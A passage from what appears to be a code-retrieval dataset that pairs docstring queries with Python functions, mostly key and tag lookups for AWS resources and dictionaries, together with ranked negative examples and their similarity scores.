response['Tags']])):\n return True\n elif self.Service == 'apigateway':\n print('No api to list tags')\n return False\n elif self.Service == 'kinesis':\n response = self.ListTagsForStream(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'cloudtrail':\n response = self.ListTags(ResourceId)\n TagsList = map(lambda RTL: RTL['TagsList'], [RTL for RTL in response['ResourceTagList']])\n for Tags in TagsList:\n for Tag in Tags:\n if Tag['Key'] == 'Channel':\n return True\n elif self.Service == 'sqs':\n response = self.ListTags(ResourceId)\n if TagName in [x for x in response['Tags']]:\n return True\n elif self.Service == 'secretsmanager':\n response = self.DescribeSecret(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'cloudfront':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'efs':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'sagemaker':\n response = self.ListTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'redshift':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'elasticache':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['TagList']])):\n return True\n elif self.Service == 'workspaces':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'ds':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'dax':\n response = self.ListTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'route53':\n response = self.ListTagsForResource(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'directconnect':\n response = self.DescribeTags(ResourceId)\n if TagName in list(map(lambda x: x['Key'], [x for x in response['Tags']])):\n return True\n elif self.Service == 'datapipeline':\n response = self.DescribePipelines(ResourceId)\n Tags = list(map(lambda x: x['tags'], [tags for tags in response['pipelineDescriptionList']]))\n for i in Tags:\n for j in i:\n if j['key'] == 'Channel':\n return True\n else:\n raise TagNotSupportedError(self.Service)\n except Exception as e:\n raise e\n\n return False", "def is_filter_at_key(self, key):\n\n if self.has_key(key):\n attribute_status = getattr(self, key)\n if isinstance(attribute_status, self.__class__):\n return True\n\n return False", "def has_key(self, key):\n return key in self", "def _is_env_per_bucket():\n\n buckets = _get_buckets()\n if isinstance(buckets, dict):\n return True\n elif isinstance(buckets, list):\n return False\n else:\n raise ValueError(\"Incorrect s3.buckets type given in config\")", "def __contains__(self, key):\n if not isinstance(key, pm.general.Attribute):\n return super(ChannelBox, self).__contains__(key)\n else:\n for attr in self:\n if key.longName() == attr.longName():\n return True\n return False", "def dexists(self, name, key):\n return key in self.db[name]", "def has_key(self, key):\n return self.__dict__.has_key(key)", "def has(self, key: str) -> Any:\n return key in self.variables", "def _is_desired_tag(self, tag):\n if self._tags is None:\n return True\n\n if self._ignore_namespace:\n for desired_tag in self._tags:\n if tag.localname == desired_tag.localname:\n return True\n else:\n for desired_tag in self._tags:\n if tag == desired_tag:\n return True\n\n return False", "def hasValue(self, key):\n return self.has_key('__' + key)", "def check_if_already_prepared(self, instance, product_attribute):\n attribute_exist = self.search([('ks_shopify_instance', '=', instance.id),\n ('ks_product_attribute', '=', product_attribute.id)], limit=1)\n if attribute_exist:\n return attribute_exist\n else:\n return False", "def has_key(self, key):\n return key in self.db", "def __contains__(self, key):\n\t\treturn key in self.__dStore", "def __contains__(self, key):\n with SessionContext(self.SessionClass) as session:\n q = session.query(PAW2_DBObject)\n return q.filter(PAW2_DBObject.key == key).count() == 1", "def __contains__(self, key):\n return hasattr(self, key)", "def check_tag(self, session, tag):\n if not tag:\n return False\n\n try:\n self._tag(session.get, key=tag, session=session)\n return True\n except exceptions.NotFound:\n return False", "def has(self, key):\n return key in self._store", "def has_deep_key(obj, key):\n\tif isinstance(key, str):\n\t\tkey = key.split('.')\n\t\t\n\tlast_obj = obj\n\tfor v in key:\n\t\tif not last_obj.has_key(v):\n\t\t\treturn False\n\t\tlast_obj = last_obj[v]\n\t\n\treturn True", "def is_perCapita(key):", "def is_key_exists(client, bucket, key):\n\n response = client.list_objects_v2(\n Bucket=bucket,\n Prefix=key,\n )\n for obj in response.get('Contents', []):\n if obj['Key'] == key:\n return True\n else:\n return False", "def has_key(self, key):\n return self.contains(key)", "def __contains__(self, key):\n return key in self._opts or key in self._groups", "def exists(\n instance_id=None,\n name=None,\n tags=None,\n region=None,\n key=None,\n keyid=None,\n profile=None,\n in_states=None,\n filters=None,\n):\n instances = find_instances(\n instance_id=instance_id,\n name=name,\n tags=tags,\n region=region,\n key=key,\n keyid=keyid,\n profile=profile,\n in_states=in_states,\n filters=filters,\n )\n if instances:\n log.info(\"Instance exists.\")\n return True\n else:\n log.warning(\"Instance does not exist.\")\n return False", "def test_Container_Contains(self):\n test = \"key3\" in ee.Dictionary({\"key1\": 1, \"key2\": 2})\n self.assertIsInstance(test, bool)", "def has(self, key):\n return False", "def has_item(self, usage_key):\r\n return usage_key in self.modules[usage_key.course_key]", "def __contains__(self, key):\n self._remove_expired()\n\n log.debug(\"__contains__: {}\".format(key))\n return key in self._d", "def hasCustomData( self, key ):\n return str(key) in self._customData", "def __contains__(self, key):\n try:\n if self[key]:\n return True\n except KeyError:\n return False", "def is_production_environment(self):\n return self.get_current_environment() == Environment.PRODUCTION", "def has_tags(self):\n return bool(self.tags)", "def contains_key(kv_json, key):\n if isinstance(kv_json, str):\n kv_dict = loads(kv_json)\n try:\n res = kv_dict[key]\n return True\n except KeyError:\n return False\n else:\n print(\"Provide A JSON Key Value String\")", "def __contains__(cls, key):\n return cls.classCase(key) in cls._Registry", "def get_tag_for_instance(self, instance_id, tag_key):\n tags = self.get_tags_for_instance(instance_id)\n for tag in tags:\n if tag['Key'] == tag_key:\n return tag['Value']\n return None", "def checker(product):\n for item in INSTOCK:\n if item == product:\n return True\n return False", "def exists(cls, ko):\n if isinstance(ko, BagDocument):\n return ko._key in cls._dbag\n else:\n return ko in cls._dbag", "def containsKey(self, key):\n return get(key) != None", "def singularity_exists(self):\n instances = Client.instances(quiet=self.quiet)\n for instance in instances:\n if self.pid in instance.name:\n return True\n return False", "def has_key(self, key):\n return key.lower() in self._data", "def contains(self, key):\n if key in self.key_list:\n return True\n return False", "def has(self, tag, index):\n return self.get(tag, index) is not None", "def checker(self, product):\n for item in self.instock:\n if item == product:\n return True\n return False", "def __contains__(self, key: object) -> bool:\n if isinstance(key, str):\n key = key.casefold()\n for k in self._keys:\n if k.casefold() == key:\n return True\n return False", "def __contains__(self, key):\n return self.keys[self._linear_probe(key, \"contains\")] is not None", "def __contains__(self, key: str) -> bool:\n return key in self.raw", "def is_matching_product_with_tags(product, lat, lng, radius, tags):\n return vincenty(\n (lat, lng),\n (product.shop.lat, product.shop.lng)\n ).meters <= radius and any(tag in product.shop.tags for tag in tags)", "def __contains__(self, key):\n return self._lookup(key).value is not None", "async def isStorObj(app, key, bucket=None):\n found = False\n client = _getStorageClient(app)\n if not bucket:\n bucket = app['bucket_name']\n else:\n log.debug(f\"using bucket: [{bucket}]\")\n log.debug(f\"isStorObj {bucket}/{key}\")\n\n found = False\n\n try:\n contents = await client.list_keys(bucket=bucket, limit=1, prefix=key)\n if contents:\n item = contents[0]\n print(\"item:\", item)\n if item == key:\n # if the key is a S3 folder, the key will be the first object in the folder,\n # not the requested object\n found = True\n\n except HTTPNotFound:\n pass # key does not exist\n\n log.debug(f\"isStorObj {key} returning {found}\")\n return found", "def exists(self, key):\n try:\n return (self.salt + str(key)) in self.DB\n except KeyError:\n return False", "def __contains__(self, key):\n if isinstance(key, Model):\n key = key.get_id()\n return (str(key) in self.get_models())", "def on_production(self):\n\n if not self.is_valid_platform() and not self.in_build():\n return False\n prod_branch = 'production' if self.on_dedicated() else 'master'\n return self['BRANCH'] == prod_branch", "def contains(self, key):\n\n return key in self.keys()", "def should_tag_volumes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"should_tag_volumes\")", "def should_tag_volumes(self) -> Optional[pulumi.Input[bool]]:\n return pulumi.get(self, \"should_tag_volumes\")", "def key_dict_contains (self,\r\n key):\r\n\r\n\r\n\r\n if self.using_database:\r\n\r\n aprint('KEYDICT CONTAINS')\r\n value_tuple = (notebookname, key,)\r\n db_cursor.execute(\"SELECT note_index\"\r\n +\" FROM keys_to_indexes\"\r\n +\" WHERE notebook=?\"\r\n +\" AND keyword=?;\",\r\n value_tuple)\r\n try:\r\n if db_cursor.fetchone()[0]:\r\n return True\r\n return False # MIGHT BE PROBLEMATIC\r\n except:\r\n return False\r\n\r\n return str(key) in self.key_dict", "def __contains__(self, key):\n return key in self.keys", "def __contains__(self, key):\n try:\n self._get(key)\n return True\n except Exception:\n return False", "def has(self, key):\n return self.data.get(key, None) is not None", "def __check_metadata(s3client, key, bucket_name):\n response = s3client.head_object(Bucket=bucket_name, Key=key)\n if 'status' in response['Metadata']:\n return response['Metadata']['status'] == 'uploaded'\n return False", "def check_key(key, options):\n animal_id, exp_date, exp_type = key.split('_')\n if ((options.animal_id is None or animal_id == options.animal_id)\n and (options.exp_date is None or exp_date == options.exp_date)\n and (options.exp_type is None or exp_type == options.exp_type)):\n return True\n else:\n return False", "def contains(self, key: int) -> bool:\n if key in self.d:\n return True\n else:\n return False", "def is_key_active(self,key):\n try: key = key.public_key()\n except: pass\n\n serialized = key.public_bytes(\n encoding = serialization.Encoding .OpenSSH,\n format = serialization.PublicFormat.OpenSSH)\n\n blob = b64decode(serialized.split(None,2)[1])\n active_keys = list(self.query_active_keys())\n\n for active_key in active_keys:\n if active_key[0] == blob:\n return True\n\n return False", "def check_image_local(self, tag):\n tags = self.get_tags()\n return (tag in tags)", "def __contains__(self, key):\n\n return key in self.keys_set", "def exist(self, key):\n record = self._storage.get(key, None)\n if record:\n return record.ttl >= time.time()\n return False", "def __contains__(self, key):\n try:\n self[key]\n return True\n except:\n return False", "def capitalize_tag_kv(service: str) -> bool:\n return service in (\"ec2\", \"iam\", \"ssm\")", "def test_tag_valid_image(self):\n alpine = self.docker.images.get(constant.ALPINE)\n self.assertTrue(alpine.tag(\"demo\", constant.ALPINE_SHORTNAME))\n\n alpine = self.docker.images.get(constant.ALPINE)\n for tag in alpine.tags:\n self.assertIn(\"alpine\", tag)", "def IsImportant(self, key):\n\n if any(x.lower() == key for x in self.keywords):\n return True\n return False", "def record_application_tags(self) -> bool:\n return pulumi.get(self, \"record_application_tags\")", "def test_s3_bucket_exists(self) -> None:\n if self.prod_env:\n bucket_name = 'saints-xctf-credentials-prod'\n else:\n bucket_name = 'saints-xctf-credentials-dev'\n\n s3_bucket = self.s3.list_objects(Bucket=bucket_name)\n return s3_bucket.get('Name') == bucket_name", "def hasEmbedded(self, tag):\n if self.embeddedTags and self.embeddedTags[-1] == tag:\n return True\n else:\n return False", "def exists(self, key_name: str) -> bool:\n pass", "def __contains__(self, attr):\n return attr in self._config", "def __contains__(self, key):\n item = self._store.get(key)\n if not item:\n return False\n\n value, expires_at = item\n if expires_at and time.time() < expires_at:\n return False\n\n return True", "def contains(name, key):\n\n return get_component(CachingPackage.COMPONENT_NAME).contains(name, key)", "def is_new_variable_product(self):\n # ====================================================================#\n # Check if Inputs Contains Attributes\n if \"attributes\" not in self._in.keys() or not isinstance(self._in[\"attributes\"], dict):\n return False\n return True", "def contains_key(self, key):\r\n\t\t# call the linked list contains() method for each bucket\r\n\t\tfor i in self._buckets:\r\n\t\t\tif i.contains(key):\r\n\t\t\t\treturn True\r\n\t\treturn False", "def hasTagValue(fluiddb, objectId, path):\n return fluiddb.objects[objectId][path].head()" ]
[ "0.63550603", "0.60692143", "0.59001714", "0.586084", "0.5793219", "0.57157636", "0.56831205", "0.56796306", "0.566162", "0.5619104", "0.5589269", "0.5552662", "0.55072737", "0.5455847", "0.5455847", "0.544153", "0.5431722", "0.54038215", "0.5395981", "0.5394134", "0.5378807", "0.53780603", "0.5374979", "0.5373266", "0.53722644", "0.53570455", "0.5352436", "0.53460425", "0.5342837", "0.5340622", "0.5338839", "0.53374827", "0.5313049", "0.52810174", "0.5279764", "0.52449846", "0.52293044", "0.5187206", "0.518672", "0.5178629", "0.5167262", "0.51554966", "0.51177853", "0.51163393", "0.5114046", "0.5106265", "0.51029736", "0.5100969", "0.5093931", "0.5090321", "0.50855863", "0.5081231", "0.507864", "0.5076453", "0.5076025", "0.5075293", "0.5071693", "0.50715953", "0.5064303", "0.50589776", "0.50574577", "0.5054578", "0.5054123", "0.5054056", "0.50507057", "0.5050696", "0.50461185", "0.5043527", "0.50432897", "0.5042496", "0.50410885", "0.5029958", "0.5029724", "0.50226116", "0.50226116", "0.50225914", "0.5021813", "0.50214624", "0.50209713", "0.5014762", "0.5009079", "0.4995438", "0.49940133", "0.49882472", "0.49860114", "0.49845234", "0.49836278", "0.49780276", "0.49764484", "0.49736336", "0.49701768", "0.49667004", "0.49612775", "0.49606255", "0.49597788", "0.49572852", "0.49450034", "0.4944589", "0.49438497", "0.49418318" ]
0.7877264
0
Name is a tag that might not exist, but if it does, it's very helpful for users to identify their resources
def get_name_tag(obj): if 'Name' in obj.tags: return obj.tags['Name'] else: return ""
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def wantsNametag(self):\n return 0", "def get_name_tag(obj):\n if 'Name' in obj.tags:\n return obj.tags['Name']\n else:\n return \"\"", "def tag(self) -> str:\n return self.name or ''", "def tag(self,name):\n return self._tags.get(name,None)", "def name_key(tags):\r\n if 'name' not in tags:\r\n return None\r\n \r\n if not tags['name']:\r\n return None\r\n \r\n return (tags['name'], )", "def tag(request, tag_name):\n raise NotImplementedError", "def get_tag_name(self):\n\n pass", "def test_get_tag_name(self):\r\n name = self.combinedoe.get_tag_name(\"<t>Tag</t>\")\r\n self.assertEqual(name, \"t\")", "def tag_name(self) -> str:\n return pulumi.get(self, \"tag_name\")", "def name(self) -> Optional[str]:\n ...", "def name(self, name):\n pass", "def name_tag(resource_name):\n return Join(\"\", [Ref('AWS::StackName'), '-', resource_name])", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def getName():", "def _issingleton(self, tagname):\n return self.shortempty", "def test_name_tags():\n road = query_row(db_conf, 'osm_roads', 1101)\n assert road['name'] == 'name', road\n assert road['name:de'] == 'name:de', road\n assert road['name_en'] == 'name:en', road", "def tag_name(self) -> pulumi.Input[str]:\n return pulumi.get(self, \"tag_name\")", "def _check_name(self):\n\t\tpass", "def has_name(self, name: str) -> bool:\n return name in self.child_tags", "def check_tag(obj, tag_name):\n rfctag = None\n if obj.get('Tags'):\n for tag in obj.get('Tags'):\n if tag.get('Key') == tag_name:\n tag_value = tag.get('Value')\n tag_value = re.sub('[,]', '/', tag_value)\n return tag_value\n continue\n if not rfctag:\n return str(\"no-record\")", "def get_name():", "def name():\n pass", "def name():\n pass", "def tag(self,name):\n try:\n return self.doc.getElementsByTagName(name)[0].firstChild.wholeText\n except IndexError:\n # Check for a hash tag with legacy API\n if name in ['md5','sha1','sha256']:\n for e in self.doc.getElementsByTagName('hashdigest'):\n if e.getAttribute('type').lower()==name:\n return e.firstChild.wholeText\n raise KeyError,name+\" not in XML\"", "def get_name(self):\n return self.tagnode", "def __get_tags(self, name):\n return Tags(\n Environment=\"ApiDev\",\n Name=\"ApiDev-Dev-\"+name,\n Owner=\"Foo industries\",\n Service=\"ServiceVPC\",\n VPC=\"Dev\",\n )", "def get_tag(self, name: str) -> Tag:\n if not name:\n raise TypeError(\"The given tag name is illegal\")\n\n try:\n tag = next(self._generate_tags(name))\n except StopIteration as error:\n raise ResourceNotExistError(resource=\"tag\", identification=name) from error\n\n return tag", "def name(self):\r\n return None", "def tag_uri(self, name):\n return 'tag:%s,%d:%s' % (self.DOMAIN, datetime.datetime.now().year, name)", "def tags():", "def __getitem__(self, name):\n tag = self._find(name)\n if tag is not None:\n return tag.text\n raise KeyError(name)", "def get_name(self):\n return None", "def get_tag(self, tag_name):\n tag_data = self.db.make_query(\n '''\n select tag_name from tag where tag_name = \"{}\"\n '''.format(tag_name)\n )\n\n if len(tag_data) > 0:\n tag_name = tag_data[0][0]\n human_readable_tag = name_util.make_decoded(tag_data[0][0])\n\n rtn_dict = {\n 'tag_name': tag_name,\n 'human_readable_name': human_readable_tag\n }\n\n return rtn_dict", "def name(self):\n return None", "def hasname(self):\n\t\treturn self.name is not None", "def get_name(self):", "def get_name(self):", "def __unicode__(self):\n return self.tag_name", "def name():\n raise NotImplementedError", "def name():\n raise NotImplementedError", "def name(self) -> str:\n ...", "def name(self) -> str:\n ...", "def name(self) -> str | None:\n pass", "def name(self):\r\n pass", "def name(self):\n pass", "def name(self):\n return NotImplemented", "def name(self) -> str: # pragma: no cover", "def name(self, name):\n return self.name", "def getName(self):", "def get_name(self):\n pass", "def get_name(self):\n pass", "def has_name(self):\n return self.name is not None", "def get_tagname(tags, tagid):\n for tag in tags:\n if tag['id'] == tagid:\n return tag['name']", "def getName(self, html):\n soup = bs(html, \"lxml\")\n results = soup.findAll(\"h1\", {\"data-reactid\" : \"7\"})\n if len(results) != 1:\n return False, None\n name = results[0].text.split(' (')[0]\n return True, name", "def tag(self, tag_name):\r\n return Tag(self, tag_name)", "def _tag_of(entry: _LexiconEntry) -> str:\n return entry[\"tag\"].upper()", "def get_tag_name(self, xml):\r\n tag = etree.fromstring(xml).tag\r\n return tag", "def name(self):\n ...", "def _add_tag(self, tag_name):\n tag = TagInfo()\n tag._name = tag_name\n self._tags.append(tag)\n return tag", "def name(self):\n raise NotImplementedError # pragma: no cover", "def get_tag(self, tag_name):\n if not tag_name:\n return None\n for tag in self._tags:\n if tag._name == tag_name:\n return tag\n pass\n new_tag = self._add_tag(tag_name)\n return new_tag", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def name(self):\n raise NotImplementedError", "def remove_tag(self, name):\n eh = SimpleErrorHandler()\n\n self._client.execute('tag', name, remove=True, eh=eh)\n\n return bool(eh)", "def getName(self):\n return \"\"", "def make_name_unique(xml_data):\r\n # VS[compat]. Take this out once course conversion is done (perhaps leave the uniqueness check)\r\n\r\n # tags that really need unique names--they store (or should store) state.\r\n need_uniq_names = ('problem', 'sequential', 'video', 'course', 'chapter',\r\n 'videosequence', 'poll_question', 'vertical')\r\n\r\n attr = xml_data.attrib\r\n tag = xml_data.tag\r\n id = lambda x: x\r\n # Things to try to get a name, in order (key, cleaning function, remove key after reading?)\r\n lookups = [('url_name', id, False),\r\n ('slug', id, True),\r\n ('name', Location.clean, False),\r\n ('display_name', Location.clean, False)]\r\n\r\n url_name = None\r\n for key, clean, remove in lookups:\r\n if key in attr:\r\n url_name = clean(attr[key])\r\n if remove:\r\n del attr[key]\r\n break\r\n\r\n def looks_like_fallback(url_name):\r\n \"\"\"Does this look like something that came from fallback_name()?\"\"\"\r\n return (url_name is not None\r\n and url_name.startswith(tag)\r\n and re.search('[0-9a-fA-F]{12}$', url_name))\r\n\r\n def fallback_name(orig_name=None):\r\n \"\"\"Return the fallback name for this module. This is a function instead of a variable\r\n because we want it to be lazy.\"\"\"\r\n if looks_like_fallback(orig_name):\r\n # We're about to re-hash, in case something changed, so get rid of the tag_ and hash\r\n orig_name = orig_name[len(tag) + 1:-12]\r\n # append the hash of the content--the first 12 bytes should be plenty.\r\n orig_name = \"_\" + orig_name if orig_name not in (None, \"\") else \"\"\r\n xml_bytes = xml.encode('utf8')\r\n return tag + orig_name + \"_\" + hashlib.sha1(xml_bytes).hexdigest()[:12]\r\n\r\n # Fallback if there was nothing we could use:\r\n if url_name is None or url_name == \"\":\r\n url_name = fallback_name()\r\n # Don't log a warning--we don't need this in the log. Do\r\n # put it in the error tracker--content folks need to see it.\r\n\r\n if tag in need_uniq_names:\r\n error_tracker(\"PROBLEM: no name of any kind specified for {tag}. Student \"\r\n \"state will not be properly tracked for this module. Problem xml:\"\r\n \" '{xml}...'\".format(tag=tag, xml=xml[:100]))\r\n else:\r\n # TODO (vshnayder): We may want to enable this once course repos are cleaned up.\r\n # (or we may want to give up on the requirement for non-state-relevant issues...)\r\n # error_tracker(\"WARNING: no name specified for module. xml='{0}...'\".format(xml[:100]))\r\n pass\r\n\r\n # Make sure everything is unique\r\n if url_name in self.used_names[tag]:\r\n # Always complain about modules that store state. If it\r\n # doesn't store state, don't complain about things that are\r\n # hashed.\r\n if tag in need_uniq_names:\r\n msg = (\"Non-unique url_name in xml. This may break state tracking for content.\"\r\n \" url_name={0}. Content={1}\".format(url_name, xml[:100]))\r\n error_tracker(\"PROBLEM: \" + msg)\r\n log.warning(msg)\r\n # Just set name to fallback_name--if there are multiple things with the same fallback name,\r\n # they are actually identical, so it's fragile, but not immediately broken.\r\n\r\n # TODO (vshnayder): if the tag is a pointer tag, this will\r\n # break the content because we won't have the right link.\r\n # That's also a legitimate attempt to reuse the same content\r\n # from multiple places. Once we actually allow that, we'll\r\n # need to update this to complain about non-unique names for\r\n # definitions, but allow multiple uses.\r\n url_name = fallback_name(url_name)\r\n\r\n self.used_names[tag].add(url_name)\r\n xml_data.set('url_name', url_name)", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def name(self) -> str:", "def isNameUsed(self, name: unicode, startId: long, stopId: long) -> bool:\n ...", "def is_real_name(name):\n return name.strip(\"<> \") in names_set", "def is_real_name(name):\n return name.strip(\"<> \") in names_set", "def test_invalid_as_name(self):\n\n def make_bad_tag():\n class BadTag(ttag.helpers.AsTag):\n as_ = ttag.Arg(named=True)\n\n self.assertRaises(template.TemplateSyntaxError, make_bad_tag)", "def _clean_tag(name):\n # In the past, the first argument to summary ops was a tag, which allowed\n # arbitrary characters. Now we are changing the first argument to be the node\n # name. This has a number of advantages (users of summary ops now can\n # take advantage of the tf name scope system) but risks breaking existing\n # usage, because a much smaller set of characters are allowed in node names.\n # This function replaces all illegal characters with _s, and logs a warning.\n # It also strips leading slashes from the name.\n if name is not None:\n new_name = _INVALID_TAG_CHARACTERS.sub('_', name)\n new_name = new_name.lstrip('/') # Remove leading slashes\n if new_name != name:\n logging.warning('Summary name %s is illegal; using %s instead.', name, new_name)\n name = new_name\n return name", "def tag(self) -> str:\n return pulumi.get(self, \"tag\")", "def looks_like_fallback(url_name):\r\n return (url_name is not None\r\n and url_name.startswith(tag)\r\n and re.search('[0-9a-fA-F]{12}$', url_name))", "def _key_from_context(self, ctx, tag_name):\n tag_context = self.get_tag_context(ctx, tag_name)\n if tag_context:\n if tag_context == \"global\":\n return \"config:tags:global\"\n elif tag_context == \"chan\":\n return \"chan:{}:tags\".format(ctx.message.channel.id)\n elif tag_context == \"guild\":\n return \"guild:{}:tags\".format(ctx.message.guild.id)\n else:\n return None", "def check_name(self, node):\n assert \"name\" in node, \"Package node does not contain attribute 'node'\"\n assert len(node[\"name\"]) >= 1, \"Expecting at least one 'name' value\"\n # TODO: add more thorough checks", "def get_tag(tag_name, tag_list):\n for i in range(len(tag_list)):\n if tag_name == str(tag_list[i]):\n return tag_list[i]", "def get_name(self): \r\n return self.name", "def get_nametag(nametag):\n # start must be valid\n if not nametag.startswith(Tags.NAMETAG_START.value):\n return None\n\n # removes the start of the tag\n nametag = nametag[len(Tags.NAMETAG_START.value):]\n\n # end must be valid\n if not nametag.endswith(Tags.NAMETAG_END.value):\n return None\n\n # removes the end of the tag\n nametag = nametag[:(len(nametag) - len(Tags.NAMETAG_END.value))]\n\n # no empty nametags\n if nametag == \"\":\n return None\n\n # checks that every single character is valid\n for c in nametag:\n if (not is_letter(c) and\n not is_number(c) and\n c != \"-\" and c != \"_\" and c != \"'\"):\n return None\n return nametag", "def get_name(self):\r\n raise NotImplementedError", "def name(self):\n raise NotImplementedError()", "def name(self):\n raise NotImplementedError()", "def tag_cmd(context, json, name):\n store: Store = context.obj[\"store\"]\n LOG.info(\"Fetch tags\")\n tag_objs = store.get_tags()\n template = schema.TagSchema()\n result = []\n for tag_obj in tag_objs:\n if name and (tag_obj.name not in name):\n continue\n LOG.debug(\"Use tag %s\", tag_obj.name)\n result.append(template.dump(tag_obj))\n if not result:\n LOG.info(\"Could not find any of the specified tags [%s]\", \", \".join(name))\n return\n if json:\n click.echo(jsonlib.dumps(result))\n return\n console = Console()\n console.print(get_tags_table(result))", "def get_name() -> str:\n pass" ]
[ "0.72620493", "0.7172717", "0.6880746", "0.682264", "0.681301", "0.67561567", "0.6694516", "0.6682618", "0.65618443", "0.6456841", "0.6435155", "0.63498676", "0.6329023", "0.6329023", "0.6329023", "0.6329023", "0.6329023", "0.6329023", "0.6262894", "0.62420034", "0.62270963", "0.62159365", "0.62100595", "0.6207879", "0.6119206", "0.60893404", "0.60893404", "0.608547", "0.60798967", "0.6067325", "0.6011586", "0.60090137", "0.59653234", "0.5960306", "0.5956636", "0.595395", "0.59352833", "0.59337014", "0.5933172", "0.5909584", "0.5909584", "0.5901306", "0.5897426", "0.5897426", "0.58871156", "0.58871156", "0.58807606", "0.58764577", "0.5875089", "0.5872424", "0.5858052", "0.5846649", "0.58400524", "0.58396375", "0.58396375", "0.58201104", "0.5815103", "0.58134806", "0.5807338", "0.5806834", "0.5797786", "0.579517", "0.57902384", "0.5785006", "0.5784597", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.57834965", "0.5766424", "0.57629794", "0.5757467", "0.57534164", "0.57534164", "0.57534164", "0.57534164", "0.57534164", "0.5750906", "0.57463795", "0.57463795", "0.5745676", "0.5741005", "0.57337385", "0.57275176", "0.5726109", "0.5723933", "0.5720795", "0.5714543", "0.5708467", "0.5707089", "0.5693878", "0.5693878", "0.5682709", "0.5682478" ]
0.7165239
2
Returns the actual instance (if only instance_id is needed, can access directly from volume) (if KEEP tag is needed, maybe it's better to grab it from a local dictionary list of instances)
def getInstanceOf(volume): # ughhhhhhhh refactor later (shouldn't do this for every single volume, takes forever) creds = credentials() conn = ec2.connect_to_region(volume.region.name, **creds) ins_id = volume.attach_data.instance_id reservation = conn.get_all_instances(instance_ids=ins_id)[0] return reservation.instances[0]
{ "objective": { "self": [], "paired": [], "triplet": [ [ "query", "document", "negatives" ] ] } }
[ "def get_instance(self, instance_id):\n return self.instances.get(instance_id)", "def get_instance_OLD (self):\n instances = self.data['instances']\n if not len(instances) == 1:\n raise Exception, \"ArchivalObject: %d Instances found\" % len(instances)\n return instances[0]", "def get_instance (self):\n instances = self.data['instances']\n if not len(instances):\n raise Exception, \"ArchivalObject: No Instances found\"\n for instance in instances:\n # print json.dumps(instance, indent=3)\n try:\n instance['sub_container']['top_container']\n return instance\n except:\n pass\n return None", "def get_instance(self, instance):\n return self._get(_instance.Instance, instance)", "def get_instance(self, db):\n table = db.metadata.tables['Instances']\n c_instance = table.c['instance']\n c_id = table.c['idInstance']\n # get prefix\n instance_header = db.session.connection().execute(select([func.substring(c_instance, 1, 4)],\n c_id == self.idInstance).select_from(\n table)).first()[0]\n data_length = db.session.connection().execute(select([func.length(c_instance)],\n c_id == self.idInstance).select_from(\n table)).first()[0]\n if data_length > 32 * 1024 * 1024:\n return \"Instance too large for processing. Please use the EDACC GUI application.\"\n if instance_header == 'LZMA': # compressed instance?\n # get blob without LZMA prefix\n instance_blob = db.session.connection().execute(select([func.substring(c_instance, 5)],\n c_id == self.idInstance).select_from(\n table)).first()[0]\n return utils.lzma_decompress(instance_blob)\n else:\n return self.instance", "def get_instance(instance):\n command = 'nova show %s' % instance\n return parse_output(Popen(command.split(), stdout=STDOUT,\n stderr=STDERR).communicate()[0])", "def find_instance_by_id ( ec2_conn, instance_id ) :\n instance_results = ec2_conn.get_only_instances( instance_ids = [ instance_id ] )\n if len( instance_results ) > 0 :\n return instance_results[ 0 ]\n\n return None", "def get_instance(tag):\n ec2 = boto.ec2.connect_to_region(AWS_REGION)\n reservations = ec2.get_all_instances()\n for res in reservations:\n for inst in res.instances:\n if \"tag\" in inst.tags.keys():\n if inst.tags[\"tag\"] == tag and inst.state == \"running\":\n #print \"Found %s\"%tag\n return inst\n print \"Couldn't find instance\"\n return None", "def _get_instance_id(self):\n return self.__instance_id", "def instance(self) -> str:\n return pulumi.get(self, \"instance\")", "def instance(self) -> str:\n return pulumi.get(self, \"instance\")", "def get_low_use_instance(self, instance_id):\n key = {\"InstanceID\": instance_id}\n return self.low_use.get_item(Key=key)", "def GetInstance(self, instance, reason=None):\n query = []\n _AppendReason(query, reason)\n\n return self._SendRequest(HTTP_GET,\n (\"/%s/instances/%s\" %\n (GANETI_RAPI_VERSION, instance)), query, None)", "def find_instance_by_type ( ec2_conn, base_name, instance_type ) :\n instance_name = get_instance_name( base_name, instance_type )\n instance_results = ec2_conn.get_only_instances( filters = { \"tag:Name\": [ instance_name ] } )\n if len( instance_results ) > 0 :\n return instance_results[ 0 ]\n\n return None", "def get_instance_id(self):\n return self.instance_id", "def instance(self) -> Optional[pulumi.Input[str]]:\n return pulumi.get(self, \"instance\")", "def get_instance_id():\n global _instance_id\n if _instance_id == '__unset':\n try:\n _instance_id = _fetch_instance_id()\n except IOError:\n 